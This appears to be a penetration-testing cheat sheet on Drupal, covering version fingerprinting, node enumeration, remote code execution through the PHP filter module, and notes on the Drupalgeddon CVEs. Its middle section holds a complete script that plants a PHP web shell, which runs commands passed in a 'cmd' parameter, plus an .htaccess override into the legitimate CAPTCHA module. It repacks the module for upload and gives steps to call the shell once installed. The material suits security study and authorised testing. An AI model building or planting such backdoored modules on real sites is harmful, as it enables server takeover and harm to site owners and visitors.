Drupal

Open-source Content Management System (CMS)

Drupal is written in PHP and supports using MySQL or PostgreSQL for the backend. Additionally, SQLite can be used if there's no DBMS installed.

Tools

Tool: droopescan
Details: A plugin-based scanner that aids security researchers in identifying issues with several CMS, Drupal among them. Usage: droopescan scan drupal --url <URL>

Default Users

Role: Administrator
Description: This user has complete control over the Drupal website.

Role: Authenticated User
Description: These users can log in to the website and perform operations such as adding and editing articles, depending on their permissions.

Role: Anonymous
Description: All visitors who are not logged in are treated as anonymous. By default, these users are only allowed to read posts.

Manual Enumeration

Version

Source code

Meta tag of name generator: <meta name="Generator" content="Drupal 8 (https://www.drupal.org)" />. Drupal 8 and later send the same value in an X-Generator HTTP response header as well. Either way only the major version is exposed; the exact point release has to come from CHANGELOG.txt or from behaviour testing.

CHANGELOG.txt

In the Drupal root directory on Drupal 7. Its first line names the exact release, e.g. "Drupal 7.31, ...". From Drupal 8 onwards the file lives at core/CHANGELOG.txt instead, and it is often deleted by hardening guides, so a 404 proves nothing.

README.txt

In the Drupal root directory. It does not carry a version number, but its presence is a quick confirmation that the site is Drupal.

/node/<NODE_ID>

Content is stored as nodes with sequential numeric IDs, so iterating /node/1, /node/2, ... reveals pages that are not linked from any menu. A 200 is a readable node, a 403 means the node exists but is unpublished or access-restricted, and a 404 means the ID is unused.
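The version checks and node walk above as a small POSIX shell helper. This is an added example and not code from the original page: the Generator meta tag and CHANGELOG samples are constructed inline so the parsers run offline, and the target URL and node range in the live functions are assumptions.

```shell
#!/bin/sh
# Added example, not code from the original page: fingerprint a Drupal version
# from the Generator meta tag / X-Generator header and from the first line of
# CHANGELOG.txt, and walk /node/<ID> URLs. The HTML and CHANGELOG samples
# below are constructed; the target URL and node range are assumptions.

# Print the "Drupal N[.N]" string from a Generator meta tag, or nothing.
# Drupal 8+ only emits the major version here ("Drupal 8").
generator_version() {
    printf '%s\n' "$1" \
        | grep -io '<meta name="generator" content="drupal [0-9][0-9.]*' \
        | head -n 1 | sed 's/.*content="//'
}

# Drupal 7's CHANGELOG.txt (root) and Drupal 8's core/CHANGELOG.txt start with
# "Drupal X.Y, YYYY-MM-DD"; print the exact version from that line, or nothing.
changelog_version() {
    printf '%s\n' "$1" | head -n 1 | sed -n 's/^Drupal \([0-9][0-9.]*\),.*/\1/p'
}

# Collect version hints from a live site (needs network; not run by default).
fingerprint() {
    base="$1"
    hdr=$(curl -s -I "$base/" | grep -i '^x-generator:' | cut -d' ' -f2- | tr -d '\r')
    echo "X-Generator:    $hdr"
    echo "meta tag:       $(generator_version "$(curl -s "$base/")")"
    echo "CHANGELOG.txt:  $(changelog_version "$(curl -s "$base/CHANGELOG.txt")")"
    echo "core/CHANGELOG: $(changelog_version "$(curl -s "$base/core/CHANGELOG.txt")")"
}

# Walk node IDs and report which exist. 200 = readable node, 403 = node exists
# but is unpublished or access-controlled (still proves the ID is taken),
# 404 = no such node. Needs network; not run by default.
enum_nodes() {
    base="$1"; max="${2:-50}"
    i=1
    while [ "$i" -le "$max" ]; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "$base/node/$i")
        case "$code" in
            200|403) echo "$code $base/node/$i" ;;
        esac
        i=$((i + 1))
    done
}

# Constructed samples so the parsers can be exercised offline.
SAMPLE_HTML='<html><head><meta name="Generator" content="Drupal 8 (https://www.drupal.org)" /></head><body></body></html>'
SAMPLE_CHANGELOG='Drupal 7.31, 2014-08-06
-----------------------
- Constructed sample change log entry.'

# Live usage (assumed target): fingerprint http://target ; enum_nodes http://target 100
```

`generator_version "$SAMPLE_HTML"` yields "Drupal 8" and `changelog_version "$SAMPLE_CHANGELOG"` yields "7.31"; on a real Drupal 8 site expect the header and meta tag to agree on the major version only, which is why the CHANGELOG check is worth the extra request.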

Attacks

Built-in

Before version 8

In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the core PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." In the Modules menu, tick the check box next to the module and scroll down to Save configuration. Next, go to Content --> Add content and create a Basic page containing the PHP snippet, making sure the Text format drop-down is set to PHP code; with any other text format the snippet is rendered as text rather than executed. After clicking Save, Drupal redirects to the new page, e.g. http://<DOMAIN>/node/<ID>, and the PHP runs with the web server's privileges every time that page is requested.

From version 8

From version 8 onwards, the PHP Filter module is no longer part of core; it has to be installed as a contributed module. Download the most recent version from the Drupal website, then go to Administration > Reports > Available updates (the location differs between Drupal versions and may be under the Extend menu). Click Browse, select the downloaded archive and click Install. Once the module is installed and enabled, click on Content and create a new basic page in the same way as in Drupal 7.

Backdoor Module

Drupal allows users with the appropriate (administrative) permissions to upload a new module. A backdoored module can be created by adding a web shell to an existing module. Modules can be found on the drupal.org website.

  • Pick a module such as CAPTCHA. Scroll down and copy the link for the tar.gz archive. Download the archive and extract its contents.

  • Create a PHP web shell (shell.php).

  • Next, create a .htaccess file to give ourselves access to the folder. This is necessary because Drupal's own .htaccess rules deny direct requests for files under /modules.

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    </IfModule>

    The configuration above re-enables rewriting with the site root as base when a file in /modules is requested, so the web server serves shell.php instead of refusing it.

  • Copy both files into the captcha folder and create a gzipped archive (note the z flag; the original command on this page produced an uncompressed tar with a .tar.gz name).

    mv shell.php .htaccess captcha
    tar czvf captcha.tar.gz captcha/

  • With administrative access, click on Manage and then Extend on the sidebar. Next, click on the + Install new module button, which leads to the install page, e.g. http://<DOMAIN>/admin/modules/install. Browse to the backdoored Captcha archive and click Install.

  • Once the installation succeeds, browse to /modules/captcha/shell.php to execute commands. The module does not need to be enabled for this to work: the file is written to disk during installation and served directly by the web server.
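The packaging steps above as one script, and the PHP snippet that the PHP filter section leaves unstated. This is an added example, not code from the original page or from the CAPTCHA project: the module directory and output path are arguments, and the shell.php filename and the cmd query parameter are this example's choices rather than anything Drupal requires.

```shell
#!/bin/sh
# Added example, not code from the original page or from the CAPTCHA project:
# drop a PHP web shell and an .htaccess into an extracted module directory and
# repack it as a gzipped tarball that Drupal's module installer accepts.
# Paths are arguments; "shell.php" and the "cmd" parameter are this example's
# own choices.
set -eu

# Minimal PHP web shell: runs the "cmd" query parameter and returns its output.
# The same snippet is what one would paste into a "PHP code" node on Drupal 7
# with the PHP filter module enabled.
write_shell() {
    cat > "$1" <<'EOF'
<?php
// Example web shell: /modules/<module>/shell.php?cmd=id
if (isset($_GET['cmd'])) {
    echo '<pre>' . htmlspecialchars(shell_exec($_GET['cmd'] . ' 2>&1')) . '</pre>';
}
EOF
}

# .htaccess from the page: re-enable rewriting under the module directory so
# the web server serves shell.php directly instead of denying the request.
write_htaccess() {
    cat > "$1" <<'EOF'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
EOF
}

# backdoor_module <extracted module dir> <output .tar.gz>
# Archive paths are relative to the module's parent, so the tarball unpacks as
# <module>/... exactly like the original archive from drupal.org. Note the z
# flag: the installer expects a .tar.gz to really be gzip-compressed.
backdoor_module() {
    mod_dir="$1"; out="$2"
    name=$(basename "$mod_dir")
    write_shell "$mod_dir/shell.php"
    write_htaccess "$mod_dir/.htaccess"
    tar czf "$out" -C "$(dirname "$mod_dir")" "$name"
    printf '%s\n' "$out"
}

# archive_has <tarball> <path>: verify a path made it into the archive
archive_has() {
    tar tzf "$1" | grep -qx "$2"
}

# Usage: tar xzf captcha.tar.gz && sh build.sh ./captcha ./captcha-backdoored.tar.gz
# Upload the result at /admin/modules/install, then request
# /modules/captcha/shell.php?cmd=id
if [ "$#" -ge 2 ]; then
    backdoor_module "$1" "$2"
fi
```

Before uploading, `archive_has captcha-backdoored.tar.gz captcha/shell.php` confirms the shell sits under the module directory; a tarball whose top-level entry is not the module name will still install but the files land in an unexpected path.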

CVE

Drupalgeddon (CVE-2014-3704, SA-CORE-2014-005) Affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authentication SQL injection in the database abstraction API's handling of array parameters; public exploits use it to create a new admin user or to achieve remote code execution.

Drupalgeddon2 (CVE-2018-7600, SA-CORE-2018-002) Affects Drupal 7.x before 7.58 and 8.x before 8.5.1 (with backports for 8.3.9 and 8.4.6). Unauthenticated remote code execution caused by insufficient sanitization of user-controlled Form API render array keys (the # properties); the well-known exploit path targets the user registration form.

Drupalgeddon3 (CVE-2018-7602, SA-CORE-2018-004) Affects Drupal 7.x before 7.59 and 8.5.x before 8.5.3 (backport 8.4.8). Remote code execution through the same improper Form API validation; public exploits require an authenticated user who is allowed to delete a node.
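A version-to-advisory check that turns the fixed releases listed above into a quick triage step after fingerprinting. This is an added example and not code from the original page; it only knows the three advisories on this page, and its version comparison is coarse (the 8.3.x and 8.4.x backport releases are not modelled), so treat its output as a prompt to verify, not a verdict.

```shell
#!/bin/sh
# Added example, not code from the original page: given a Drupal version
# string, print the core advisories from this page that the version predates.
# Fixed releases: 7.32 (CVE-2014-3704), 7.58 / 8.5.1 (CVE-2018-7600),
# 7.59 / 8.5.3 (CVE-2018-7602). Backports for 8.3.x / 8.4.x are not modelled.

# version_lt A B: true if A is strictly lower than B, comparing numerically
# component by component (7.9 < 7.10, unlike plain string comparison).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# drupal_cves <version>: one line per advisory the version is still exposed to.
# A major-only input such as "8" (all the Generator tag gives) compares as 8.0
# and so lists every 8.x advisory; confirm with core/CHANGELOG.txt.
drupal_cves() {
    v="$1"
    case "${v%%.*}" in
        7)
            version_lt "$v" 7.32 && echo "CVE-2014-3704 Drupalgeddon  (pre-auth SQLi, fixed in 7.32)"
            version_lt "$v" 7.58 && echo "CVE-2018-7600 Drupalgeddon2 (unauth RCE, fixed in 7.58)"
            version_lt "$v" 7.59 && echo "CVE-2018-7602 Drupalgeddon3 (auth RCE, fixed in 7.59)"
            ;;
        8)
            version_lt "$v" 8.5.1 && echo "CVE-2018-7600 Drupalgeddon2 (unauth RCE, fixed in 8.5.1)"
            version_lt "$v" 8.5.3 && echo "CVE-2018-7602 Drupalgeddon3 (auth RCE, fixed in 8.5.3)"
            ;;
        *)
            echo "no advisories on this page for major version ${v%%.*}"
            ;;
    esac
    return 0
}

# Usage: drupal_cves 7.31   (version taken from CHANGELOG.txt or the meta tag)
```

For 7.31 all three advisories print; for 7.58 only Drupalgeddon3 remains; for 8.5.3 nothing prints. The shell's lexical `sort` would have ranked 7.9 above 7.10, which is why the comparison is done numerically in awk.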
